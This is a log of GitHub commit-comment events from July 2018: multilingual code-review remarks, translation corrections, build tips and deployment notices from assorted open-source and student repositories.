{"id":"7906372131","type":"CommitCommentEvent","actor":{"login":"Alex-Sokolov"},"repo":{"name":"selkinvitaly/vue_3"},"payload":{"comment":{"id":29565827,"position":10,"line":10,"path":"src/App.vue","commit_id":"c87d759958f1f5865efa2c39af7a661ba71e79b7","created_at":"2018-07-02T12:31:52Z","updated_at":"2018-07-02T12:31:52Z","author_association":"NONE","body":"Да, где мы описываем список маршрутов опцией"}},"created_at":"2018-07-02T12:31:52Z"}
{"id":"7906372219","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29565829,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-02T12:31:53Z","updated_at":"2018-07-02T12:31:53Z","author_association":"NONE","body":"made copies of ffmpeg includes into the respective folders in /usr/include and it built successfully.  if you want to have me delete the folders, and run config, I can, to see what shows up."}},"created_at":"2018-07-02T12:31:53Z"}
{"id":"7906373107","type":"CommitCommentEvent","actor":{"login":"arasif"},"repo":{"name":"arasif/arasif.github.io"},"payload":{"comment":{"id":29565830,"position":null,"line":null,"path":null,"commit_id":"6173d2367bd20ff50ed77f6cf2e938a2a9b77573","created_at":"2018-07-02T12:32:05Z","updated_at":"2018-07-02T12:32:05Z","author_association":"OWNER","body":"main .css file link is added"}},"created_at":"2018-07-02T12:32:05Z"}
{"id":"7906374635","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29565835,"position":null,"line":null,"path":null,"commit_id":"8fb0d6da7b81992443aafc114acda9ab5e50dde4","created_at":"2018-07-02T12:32:23Z","updated_at":"2018-07-02T12:32:23Z","author_association":"MEMBER","body":"Aha, then this is optional. Try if renamed https://github.com/RPi-Distro/firmware-nonfree/blob/master/brcm/brcmfmac43455-sdio.clm_blob is working/error gone."}},"created_at":"2018-07-02T12:32:23Z"}
{"id":"7906382575","type":"CommitCommentEvent","actor":{"login":"calestyo"},"repo":{"name":"dCache/dcache"},"payload":{"comment":{"id":29565859,"position":null,"line":null,"path":null,"commit_id":"ee8f1148ce7597c7687a35f766652bb2470fd908","created_at":"2018-07-02T12:34:00Z","updated_at":"2018-07-02T12:34:00Z","author_association":"CONTRIBUTOR","body":"Thanks, for the info.\r\n\r\nhttps://github.com/dCache/dcache/issues/4062"}},"created_at":"2018-07-02T12:34:00Z"}
{"id":"7906384754","type":"CommitCommentEvent","actor":{"login":"wookienz"},"repo":{"name":"ramonsaraiva/pubg-python"},"payload":{"comment":{"id":29565863,"position":null,"line":null,"path":null,"commit_id":"d53d4c2c5d2ab05f79b3246c3ea2b17d2dd2aaa6","created_at":"2018-07-02T12:34:27Z","updated_at":"2018-07-02T12:34:27Z","author_association":"CONTRIBUTOR","body":"agree, this is now broken in 1.4 API"}},"created_at":"2018-07-02T12:34:27Z"}
{"id":"7906394646","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"builov/gb-yii2"},"payload":{"comment":{"id":29565882,"position":86,"line":98,"path":"basic/models/User.php","commit_id":"2dcf60e49784cb8ed03bda9ace9ac47fa103fd13","created_at":"2018-07-02T12:36:26Z","updated_at":"2018-07-02T12:36:26Z","author_association":"NONE","body":"закомментированный код надо удалять. При необходимости можно все найти в истории гита"}},"created_at":"2018-07-02T12:36:26Z"}
{"id":"7906396151","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29565889,"position":null,"line":null,"path":null,"commit_id":"c754ece8f5f798047fe1810b9c56ed0b3a9386ac","created_at":"2018-07-02T12:36:43Z","updated_at":"2018-07-02T12:36:43Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/how-do-i-get-the-with-email-login-option/91327/13\n"}},"created_at":"2018-07-02T12:36:43Z"}
{"id":"7906399686","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/cookiecutter-flask"},"payload":{"comment":{"id":29565894,"position":25,"line":25,"path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/database.py","commit_id":"73281860865e0c1ed5ba806f6ce504a2c1e2c4c1","created_at":"2018-07-02T12:37:27Z","updated_at":"2018-07-02T12:37:27Z","author_association":"OWNER","body":"Good call @fantix . This mixin was copied from another project template (Flask-Bones, I believe). I agree with your suggested changes, though.\r\n\r\nI would certainly review and merge a PR."}},"created_at":"2018-07-02T12:37:27Z"}
{"id":"7906404900","type":"CommitCommentEvent","actor":{"login":"peterHeuz"},"repo":{"name":"stefanstrueder/CSS-project"},"payload":{"comment":{"id":29565905,"position":17,"line":17,"path":"sentiment.py","commit_id":"78eb719bd9c9932dc5aeb9e4a4da32687f21db6f","created_at":"2018-07-02T12:38:29Z","updated_at":"2018-07-02T12:38:29Z","author_association":"COLLABORATOR","body":"I also saw the subjectivity value but I do not see why it provides a value to us. What do you mean with \"it shows how much our results are representative\"? "}},"created_at":"2018-07-02T12:38:29Z"}
{"id":"7906410560","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29565916,"position":13,"line":200,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-02T12:39:38Z","updated_at":"2018-07-02T12:39:38Z","author_association":"NONE","body":"Не понимаю, что этот метод должен делать. При чем тут поезд? Почему он получает 1 вагон аргументом, а обращается с этим вагоном, так как-будто это коллекция вагонов? Что ты хотел тут сделать?"}},"created_at":"2018-07-02T12:39:38Z"}
{"id":"7906412321","type":"CommitCommentEvent","actor":{"login":"ChristianeSchleyer"},"repo":{"name":"ChristianeSchleyer/guild"},"payload":{"comment":{"id":29565922,"position":null,"line":null,"path":null,"commit_id":"b86a0459ae364711f87ea1609e9cc817b4b9be7b","created_at":"2018-07-02T12:39:59Z","updated_at":"2018-07-02T12:39:59Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-02T12:39:59Z"}
{"id":"7906413395","type":"CommitCommentEvent","actor":{"login":"ccggyo"},"repo":{"name":"millhego/hiMySQL"},"payload":{"comment":{"id":29565925,"position":null,"line":null,"path":null,"commit_id":"c15b6bef9e714aba4c3b6eecb323b114e144553f","created_at":"2018-07-02T12:40:13Z","updated_at":"2018-07-02T12:40:13Z","author_association":"COLLABORATOR","body":"阿斯达岁的"}},"created_at":"2018-07-02T12:40:13Z"}
{"id":"7906415111","type":"CommitCommentEvent","actor":{"login":"malcolmarobertson"},"repo":{"name":"malcolmarobertson/ELEN7045-APS"},"payload":{"comment":{"id":29565931,"position":54,"line":85,"path":"aps/src/aps/application/impl/MappingServiceImpl.java","commit_id":"474033bc1543ba9dd3b21235c9650524466f1b63","created_at":"2018-07-02T12:40:32Z","updated_at":"2018-07-02T12:40:32Z","author_association":"OWNER","body":"Code for reflecting Datapair Key/value pairs"}},"created_at":"2018-07-02T12:40:32Z"}
{"id":"7906415923","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"BLUENCE/TIL"},"payload":{"comment":{"id":29565935,"position":123,"line":123,"path":"180702_bluence.md","commit_id":"d61326453d5ec85a7e935a20fba1c19eba3b4d49","created_at":"2018-07-02T12:40:42Z","updated_at":"2018-07-02T12:40:42Z","author_association":"NONE","body":"유독 \"understand\" 부분 뿐 아니라 \"import\"에서 \"communication\"에 이르는 전체 과정을 되도록 \"작지만 의미있는 단위로\" 나누어 여러 번 반복적으로 수행하는 편이 더 좋아요. 반대로 말하자면, 한번에 완전한 데이터를 가져와서(import) 오랜 기간 분석을 하고 거창한 결과를 내놓는(communication) 방식은 덜 유용한 경우가 많습니다."}},"created_at":"2018-07-02T12:40:42Z"}
{"id":"7906421737","type":"CommitCommentEvent","actor":{"login":"fantix"},"repo":{"name":"sloria/cookiecutter-flask"},"payload":{"comment":{"id":29565946,"position":25,"line":25,"path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/database.py","commit_id":"73281860865e0c1ed5ba806f6ce504a2c1e2c4c1","created_at":"2018-07-02T12:41:52Z","updated_at":"2018-07-02T12:41:52Z","author_association":"NONE","body":"@sloria My worry is that changing the default to `commit=False` might be too intrusive, as there might be many tutorials and blog posts out there assuming the current default. If so, I can submit a PR to simply add the keyword argument `commit=True` in `create()`."}},"created_at":"2018-07-02T12:41:52Z"}
{"id":"7906426774","type":"CommitCommentEvent","actor":{"login":"Prunt"},"repo":{"name":"TheXManGuy/Wabariik"},"payload":{"comment":{"id":29565953,"position":null,"line":null,"path":null,"commit_id":"aa5b9a1d878c35bf9a41a2984f89cd082fbb2ab6","created_at":"2018-07-02T12:42:52Z","updated_at":"2018-07-02T12:42:52Z","author_association":"NONE","body":"1. Sõna volitus asemel oleme kasutanud pigem `õigus`: `Sul pole selleks piisavalt õigusi.`\r\n2. `Konfiguratsjoon` on valesti kirjutatud, õige on `konfiguratsioon`.\r\n3. `new/old blocks` ei ole `uute asjade/vana ese`, vaid `uut/vana plokki`.\r\n4. `restart` võiks samuti tõlkida eesti keelde: `taaskäivitus`.\r\n5. `blocks` ei ole `kast`, vaid `plokki`, samuti `from database` tähendab `andmebaasist`.\r\n6. Real 14 on sõna `Took` tõlkimata."}},"created_at":"2018-07-02T12:42:52Z"}
{"id":"7906433849","type":"CommitCommentEvent","actor":{"login":"Prunt"},"repo":{"name":"TheXManGuy/Wabariik"},"payload":{"comment":{"id":29565974,"position":null,"line":null,"path":null,"commit_id":"4b8f183e551ed8a7ee57c0339c5bafc7f13cd438","created_at":"2018-07-02T12:44:14Z","updated_at":"2018-07-02T12:44:14Z","author_association":"NONE","body":"1. `biome` ei ole pind, vaid nt `bioom` vms.\r\n2. Real 23 ei taheta näha `detaile`, vaid `õpetust`."}},"created_at":"2018-07-02T12:44:14Z"}
{"id":"7906440122","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565980,"position":1,"line":47,"path":"agent/core/src/test/java/com/axway/ats/agent/core/configuration/Test_RemoteLoggingConfigurator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:45:20Z","updated_at":"2018-07-02T12:45:20Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:45:20Z"}
{"id":"7906442513","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29565981,"position":26,"line":210,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-02T12:45:46Z","updated_at":"2018-07-02T12:45:46Z","author_association":"NONE","body":"вот используешь ты его почти правильно. Давай, что-б связать этот метод с поездом будем закидывать поезд аргументом. Дальше в методе #train_number_wagon перепиши, что-б метод принимал поезд аргументом. И пробегался по всем его вагонам и выводил номер каждого вагона. И давай переименуем метод в #train_wagons_with_numbers. Так понятней будет, что он выводит вагоны поезда с номерами"}},"created_at":"2018-07-02T12:45:46Z"}
{"id":"7906443710","type":"CommitCommentEvent","actor":{"login":"jedie"},"repo":{"name":"behconsci/template"},"payload":{"comment":{"id":29565988,"position":5,"line":31,"path":"project_name/settings/__init__.py","commit_id":"9dae25241ca2f0683e156b11d2fdc93ee5d8052c","created_at":"2018-07-02T12:46:00Z","updated_at":"2018-07-02T12:46:00Z","author_association":"NONE","body":"eval() ... really?!?"}},"created_at":"2018-07-02T12:46:00Z"}
{"id":"7906444267","type":"CommitCommentEvent","actor":{"login":"Prunt"},"repo":{"name":"TheXManGuy/Wabariik"},"payload":{"comment":{"id":29565989,"position":null,"line":null,"path":null,"commit_id":"6a1bf21498dc52b4a2246124c015ca998141e1f9","created_at":"2018-07-02T12:46:06Z","updated_at":"2018-07-02T12:46:06Z","author_association":"NONE","body":"Sinu poolt välja pakutud süsteem ei toimiks üldse, loe `commands.yml` faili kohta lähemalt: https://bukkit.gamepedia.com/Commands.yml#aliases"}},"created_at":"2018-07-02T12:46:06Z"}
{"id":"7906446511","type":"CommitCommentEvent","actor":{"login":"pplux"},"repo":{"name":"floooh/sokol"},"payload":{"comment":{"id":29565993,"position":null,"line":null,"path":null,"commit_id":"f89f9d5d43a181b3b7e8e9e84c57ced69b0bb9a9","created_at":"2018-07-02T12:46:30Z","updated_at":"2018-07-02T12:46:30Z","author_association":"CONTRIBUTOR","body":"better, I was unsure if starting with 0 was the correct choice or not. Thanks, btw, great great project."}},"created_at":"2018-07-02T12:46:30Z"}
{"id":"7906450719","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29565996,"position":33,"line":215,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-02T12:47:22Z","updated_at":"2018-07-02T12:47:22Z","author_association":"NONE","body":"Вот тут у тебя не работает наверно. Потому-что train.wagons это массив, и массива не существует метода remove_wagon. Думаю этот метод у тебя определен в поезде, соответственно там он и должен использоваться"}},"created_at":"2018-07-02T12:47:22Z"}
{"id":"7906451552","type":"CommitCommentEvent","actor":{"login":"sloria"},"repo":{"name":"sloria/cookiecutter-flask"},"payload":{"comment":{"id":29565999,"position":25,"line":25,"path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/database.py","commit_id":"73281860865e0c1ed5ba806f6ce504a2c1e2c4c1","created_at":"2018-07-02T12:47:32Z","updated_at":"2018-07-02T12:47:32Z","author_association":"OWNER","body":"Yeah, a separate PR fixing the `create` issue is a good idea.\r\n\r\nPerhaps if one don't want autocommit-ing behavior, they should avoid using the `CRUDMixin` methods."}},"created_at":"2018-07-02T12:47:32Z"}
{"id":"7906452131","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566002,"position":16,"line":16,"path":"agent/core/src/test/resources/ExpectedGeneratedFiles/com/axway/ats/agent/ant/ComplexActionClass.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:47:39Z","updated_at":"2018-07-02T12:47:39Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:47:39Z"}
{"id":"7906452150","type":"CommitCommentEvent","actor":{"login":"tigomiddelkoop"},"repo":{"name":"tigomiddelkoop/myband"},"payload":{"comment":{"id":29566003,"position":null,"line":null,"path":null,"commit_id":"206fec47a7bb51bc0dae028af12c5baa24ff09b6","created_at":"2018-07-02T12:47:39Z","updated_at":"2018-07-02T12:47:39Z","author_association":"OWNER","body":"Correction\r\n\r\nSome messages were static which needed to be dynamic for upcoming features 😄 "}},"created_at":"2018-07-02T12:47:39Z"}
{"id":"7906454366","type":"CommitCommentEvent","actor":{"login":"behconsci"},"repo":{"name":"behconsci/template"},"payload":{"comment":{"id":29566007,"position":5,"line":31,"path":"project_name/settings/__init__.py","commit_id":"9dae25241ca2f0683e156b11d2fdc93ee5d8052c","created_at":"2018-07-02T12:48:05Z","updated_at":"2018-07-02T12:48:05Z","author_association":"OWNER","body":"yea since env file is gitignored and can be given only by devs but i am\naware of the risk\n\nJens Diemer <notifications@github.com> schrieb am Mo. 2. Juli 2018 um 14:46:\n\n> eval() ... really?!?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/behconsci/template/commit/9dae25241ca2f0683e156b11d2fdc93ee5d8052c#commitcomment-29565988>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJ4OM6-12HBYqeD0J1DARkpufvT7AHCSks5uChYJgaJpZM4U_QB6>\n> .\n>\n"}},"created_at":"2018-07-02T12:48:05Z"}
{"id":"7906457636","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29566016,"position":null,"line":null,"path":null,"commit_id":"0ac7e00cd11c8f70daf217849de3eeaa37e8df2a","created_at":"2018-07-02T12:48:45Z","updated_at":"2018-07-02T12:48:45Z","author_association":"MEMBER","body":"We need:\r\n\r\naml\r\naml_fe\r\navl6862 (We have it)\r\nr848a\r\n\r\nfor \"KERNEL_MODULE_AUTOLOAD\" too ..."}},"created_at":"2018-07-02T12:48:45Z"}
{"id":"7906460164","type":"CommitCommentEvent","actor":{"login":"keithwm2165"},"repo":{"name":"anitaNeutrino/icemc"},"payload":{"comment":{"id":29566017,"position":null,"line":null,"path":null,"commit_id":"aaab810815e4d4941bcdcdce6207ee49f3326fc6","created_at":"2018-07-02T12:49:14Z","updated_at":"2018-07-02T12:49:14Z","author_association":"CONTRIBUTOR","body":"Also, I forgot to mention the change to the default inputs.anita4.conf file which is to turn off CW (by default)."}},"created_at":"2018-07-02T12:49:14Z"}
{"id":"7906460215","type":"CommitCommentEvent","actor":{"login":"lenkis"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":29566018,"position":null,"line":null,"path":null,"commit_id":"36cb34da6a70210b61c759bad2382aca31ce9b49","created_at":"2018-07-02T12:49:14Z","updated_at":"2018-07-02T12:49:14Z","author_association":"COLLABORATOR","body":"let's put it shorter + avoid the confusing \"fail\":\r\nEvaluate a local Lua file on a running Tarantool instance."}},"created_at":"2018-07-02T12:49:14Z"}
{"id":"7906461120","type":"CommitCommentEvent","actor":{"login":"VidyasagarMSC"},"repo":{"name":"VidyasagarMSC/cloudco-insurance-bot"},"payload":{"comment":{"id":29566020,"position":null,"line":null,"path":null,"commit_id":"3850826d9e57eaaf8824a1f8f6a0e614e79ccba4","created_at":"2018-07-02T12:49:24Z","updated_at":"2018-07-02T12:49:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/6fbc7a48-a08d-4d4d-ace7-cb823c753512?env_id=ibm%3Ayp%3Aeu-de \"CloudCo\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/0eb57583-e6a6-4415-8ed2-7e12e1803f7c?env_id=ibm%3Ayp%3Aeu-de \"bot (master)\") deployed [cloudco-insurance-bot](https://github.com/VidyasagarMSC/cloudco-insurance-bot/releases/tag/deploy-ibm-yp-eu-de-vidyasagar.msc-in.ibm.com-Demo-20180702-124917 \"deploy-ibm-yp-eu-de-vidyasagar.msc-in.ibm.com-Demo-20180702-124917\") to [Demo](https://console.bluemix.net/apps/e01d6a8f-68a4-462f-8318-f504c1942758?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:vidyasagar.msc@in.ibm.com:Demo\"), including this commit"}},"created_at":"2018-07-02T12:49:24Z"}
{"id":"7906462678","type":"CommitCommentEvent","actor":{"login":"Prunt"},"repo":{"name":"TheXManGuy/Wabariik"},"payload":{"comment":{"id":29566021,"position":null,"line":null,"path":null,"commit_id":"8aa914e69efb2ec9344c8c93a80361c9443df44e","created_at":"2018-07-02T12:49:43Z","updated_at":"2018-07-02T12:49:43Z","author_association":"NONE","body":"1. Rida 31: eesti keeles on hea kirjutada muutuja tüüp selle ette (`...lõimu $c{warp}`), samuti on seal värvid paigast ära.\r\n2. Read 51-52: erinevalt inglise keelest ei kirjutata eesti keeles lause keskele suurte algustähtedega tavalisi sõnu (`Viga: mängijat...`).\r\n3. `Konfiguratsjoon` on valesti kirjutatud, õige on `konfiguratsioon`."}},"created_at":"2018-07-02T12:49:43Z"}
{"id":"7906463665","type":"CommitCommentEvent","actor":{"login":"AK-007"},"repo":{"name":"AK-007/train-query-crawl"},"payload":{"comment":{"id":29566026,"position":107,"line":107,"path":"app.js","commit_id":"baa696f26ff7fedd1ae00cbcfaf9e19bed403c80","created_at":"2018-07-02T12:49:54Z","updated_at":"2018-07-02T12:49:54Z","author_association":"OWNER","body":"I dont want to crawl the site if the information is present locally.\r\nI threw an error when the file was present locally to skip further requests."}},"created_at":"2018-07-02T12:49:54Z"}
{"id":"7906464966","type":"CommitCommentEvent","actor":{"login":"matthewford"},"repo":{"name":"bitzesty/trade-tariff-management"},"payload":{"comment":{"id":29566028,"position":4,"line":74,"path":"app/interactors/measures/bulk_saver.rb","commit_id":"cd060561c1a2554989eefe43f3c5a328ed92b697","created_at":"2018-07-02T12:50:09Z","updated_at":"2018-07-02T12:50:09Z","author_association":"CONTRIBUTOR","body":"is this a placeholder for hooking in the real conformance/validation rules? "}},"created_at":"2018-07-02T12:50:09Z"}
{"id":"7906467128","type":"CommitCommentEvent","actor":{"login":"anna-shumylo"},"repo":{"name":"stefanstrueder/CSS-project"},"payload":{"comment":{"id":29566030,"position":17,"line":17,"path":"sentiment.py","commit_id":"78eb719bd9c9932dc5aeb9e4a4da32687f21db6f","created_at":"2018-07-02T12:50:32Z","updated_at":"2018-07-02T12:50:32Z","author_association":"COLLABORATOR","body":"I just thought that we can also collect value of subjectivity for our tweets to say \"How much our tweets are subjective\", because then more they are objective then more our results of happiness are representative. If you need more info about subjectivity, you can find it here:"}},"created_at":"2018-07-02T12:50:32Z"}
{"id":"7906469432","type":"CommitCommentEvent","actor":{"login":"879211310"},"repo":{"name":"879211310/Pro2"},"payload":{"comment":{"id":29566038,"position":null,"line":null,"path":null,"commit_id":"c559d23ef08332e781ad244b959d01c9ec0effc9","created_at":"2018-07-02T12:50:58Z","updated_at":"2018-07-02T12:50:58Z","author_association":"OWNER","body":"dfd"}},"created_at":"2018-07-02T12:50:58Z"}
{"id":"7906470007","type":"CommitCommentEvent","actor":{"login":"879211310"},"repo":{"name":"879211310/Pro2"},"payload":{"comment":{"id":29566039,"position":null,"line":null,"path":null,"commit_id":"c559d23ef08332e781ad244b959d01c9ec0effc9","created_at":"2018-07-02T12:51:05Z","updated_at":"2018-07-02T12:51:05Z","author_association":"OWNER","body":"sdf"}},"created_at":"2018-07-02T12:51:05Z"}
{"id":"7906476078","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566051,"position":1,"line":17,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/ActionQueue.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:52:13Z","updated_at":"2018-07-02T12:52:13Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T12:52:13Z"}
{"id":"7906480241","type":"CommitCommentEvent","actor":{"login":"DirtyHairy"},"repo":{"name":"stella-emu/stella"},"payload":{"comment":{"id":29566059,"position":null,"line":null,"path":null,"commit_id":"d8b4228eada115f8db93e0fe9d536b6a64984edd","created_at":"2018-07-02T12:53:00Z","updated_at":"2018-07-02T12:53:00Z","author_association":"MEMBER","body":"No worries, after all, we are all doing this in our spare time :smirk:"}},"created_at":"2018-07-02T12:53:00Z"}
{"id":"7906484611","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29566068,"position":61,"line":406,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T12:53:52Z","updated_at":"2018-07-02T12:53:52Z","author_association":"OWNER","body":"Согласен."}},"created_at":"2018-07-02T12:53:52Z"}
{"id":"7906490651","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29566082,"position":113,"line":435,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T12:55:00Z","updated_at":"2018-07-02T12:55:00Z","author_association":"OWNER","body":"Я думаю наперёд можно сделать \"Блокировать предупреждения о повторных отправлениях на этот адрес?\". Там будет видно при тестировании."}},"created_at":"2018-07-02T12:55:00Z"}
{"id":"7906494879","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29566088,"position":null,"line":null,"path":null,"commit_id":"0e51e2287688d438b05334d78845832d4acbb7ff","created_at":"2018-07-02T12:55:49Z","updated_at":"2018-07-02T12:55:49Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=9)"}},"created_at":"2018-07-02T12:55:49Z"}
{"id":"7906496336","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566089,"position":1,"line":1,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/configuration/AgentConfigurationLandscape.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:56:06Z","updated_at":"2018-07-02T12:56:06Z","author_association":"OWNER","body":"Reolved"}},"created_at":"2018-07-02T12:56:06Z"}
{"id":"7906498948","type":"CommitCommentEvent","actor":{"login":"tarelli"},"repo":{"name":"LEMS/jLEMS"},"payload":{"comment":{"id":29566096,"position":18,"line":18,"path":"src/test/java/org/lemsml/jlems/test/URLInclusionReaderTest.java","commit_id":"b63da4d3b7aa1efd48c163ed374104b93925286d","created_at":"2018-07-02T12:56:35Z","updated_at":"2018-07-02T12:56:35Z","author_association":"MEMBER","body":"@pgleeson not that I know of! cc @adrianq maybe?"}},"created_at":"2018-07-02T12:56:35Z"}
{"id":"7906499912","type":"CommitCommentEvent","actor":{"login":"thefazzer"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29566105,"position":5,"line":32,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T12:56:45Z","updated_at":"2018-07-02T12:56:45Z","author_association":"CONTRIBUTOR","body":"Not sure whats needed here - is there a problem with brackets syntax...\r\nIf I add additional brackets won't these will be redundant?\r\n"}},"created_at":"2018-07-02T12:56:45Z"}
{"id":"7906503314","type":"CommitCommentEvent","actor":{"login":"thefazzer"},"repo":{"name":"stratisproject/StratisBitcoinFullNode"},"payload":{"comment":{"id":29566114,"position":18,"line":43,"path":"src/Stratis.Bitcoin.Tests/Consensus/ConsensusTestExtensions.cs","commit_id":"eb0af7c2486be3e3585fcf242ca063c2596a02cf","created_at":"2018-07-02T12:57:24Z","updated_at":"2018-07-02T12:57:24Z","author_association":"CONTRIBUTOR","body":"Remove the empty line between the final bracket and return true; ?"}},"created_at":"2018-07-02T12:57:24Z"}
{"id":"7906504423","type":"CommitCommentEvent","actor":{"login":"exxistance"},"repo":{"name":"exxistance/horticube"},"payload":{"comment":{"id":29566118,"position":null,"line":null,"path":null,"commit_id":"8f15a7539d7361d70dfe86d6a7894836a78da68d","created_at":"2018-07-02T12:57:37Z","updated_at":"2018-07-02T12:57:37Z","author_association":"OWNER","body":"Version 1 for test documentation"}},"created_at":"2018-07-02T12:57:37Z"}
{"id":"7906506072","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"chacha816/TIL"},"payload":{"comment":{"id":29566122,"position":4,"line":4,"path":"20180702.md","commit_id":"03a98fb5215fca3bfd791e0c508561a2b2c511fa","created_at":"2018-07-02T12:57:57Z","updated_at":"2018-07-02T12:57:57Z","author_association":"NONE","body":"조금 부연하자면 애자일 방법론은 일을 하는 과정에서 자주 구체적인 피드백을 받도록 유도하는 점, 서로의 지식을 자주 교환하도록 유도하는 점 등의 특징으로 인해 학습을 장려하는 효과가 있습니다. 일과 학습을 병행하지 않으면, 경력이 늘어도 실력이 늘지 않거나 오히려 실력이 줄 수 있기 때문에 위험할 수 있습니다."}},"created_at":"2018-07-02T12:57:57Z"}
{"id":"7906506275","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566123,"position":14,"line":48,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/AbstractClientExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:58:00Z","updated_at":"2018-07-02T12:58:00Z","author_association":"OWNER","body":"Reolved"}},"created_at":"2018-07-02T12:58:00Z"}
{"id":"7906506506","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566125,"position":26,"line":89,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/AbstractClientExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:58:03Z","updated_at":"2018-07-02T12:58:03Z","author_association":"OWNER","body":"Reolved"}},"created_at":"2018-07-02T12:58:03Z"}
{"id":"7906506685","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566127,"position":37,"line":142,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/AbstractClientExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T12:58:05Z","updated_at":"2018-07-02T12:58:05Z","author_association":"OWNER","body":"Reolved"}},"created_at":"2018-07-02T12:58:05Z"}
